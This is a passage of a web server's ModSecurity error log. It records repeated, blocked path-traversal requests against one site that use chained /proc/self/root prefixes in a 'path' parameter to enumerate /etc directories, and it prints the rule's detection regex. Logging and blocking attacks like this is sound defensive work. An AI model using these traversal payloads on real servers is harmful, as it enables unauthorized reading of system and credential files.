"OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7zgeiSKl8TjouI-b68wAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:31.334363 2026] [:error] [pid 1016:tid 140411590858496] [client 74.7.241.46:40856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk7z5qmL8PQht4WJFlBJgAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:32.519154 2026] [:error] [pid 1961:tid 140411632822016] [client 74.7.241.46:40872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk70HRXaaWotPICgYsdtgAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:33.828325 2026] [:error] [pid 1016:tid 140411683178240] [client 74.7.241.46:40884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk70ZqmL8PQht4WJFlBJwAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:35.160484 2026] [:error] [pid 11293:tid 140411582465792] [client 74.7.241.46:40900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk709CmCSWTlPouqorD-gAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:36.422708 2026] [:error] [pid 1210:tid 140411632822016] [client 74.7.241.46:40916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk71FKJy4A1bGlmj9BONAAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:37.752554 2026] [:error] [pid 2305:tid 140411632822016] [client 74.7.241.46:40926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk71QQohV2v-7oj5HHzmQAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:39.061254 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.241.46:36694] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk71wQohV2v-7oj5HHzmwAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:40.450229 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.241.46:36708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk72JqmL8PQht4WJFlBLAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:42.019686 2026] [:error] [pid 2305:tid 140411574073088] [client 74.7.241.46:36724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk72gQohV2v-7oj5HHzoAAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:43.339558 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.241.46:36730] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk72-82sZHvlq4xgHq8NQAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:44.638134 2026] [:error] [pid 2305:tid 140411649607424] [client 74.7.241.46:36732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk73AQohV2v-7oj5HHzpAAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:45.859531 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.241.46:36748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk73ZqmL8PQht4WJFlBLgAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:48.241476 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.241.46:36758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk73-82sZHvlq4xgHq8OQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:49.325150 2026] [:error] [pid 2305:tid 140411548894976] [client 74.7.243.203:39776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk74QQohV2v-7oj5HHzpwAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:32:49.525399 2026] [:error] [pid 1961:tid 140411666392832] [client 74.7.241.46:54674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk74XRXaaWotPICgYsduAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:50.719754 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.46:54690] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk74qBJNF7axNlVR0X1eAAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:52.056422 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.241.46:54698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk75NCmCSWTlPouqorD_QAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:53.235376 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.46:54702] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk75aBJNF7axNlVR0X1eQAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:54.574715 2026] [:error] [pid 1961:tid 140411607643904] [client 74.7.241.46:54714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk75nRXaaWotPICgYsdugAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:55.795487 2026] [:error] [pid 2305:tid 140411708356352] [client 74.7.241.46:54726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk75wQohV2v-7oj5HHzqAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:32:58.392946 2026] [:error] [pid 1016:tid 140411624429312] [client 74.7.241.46:54728] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk76ZqmL8PQht4WJFlBMwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
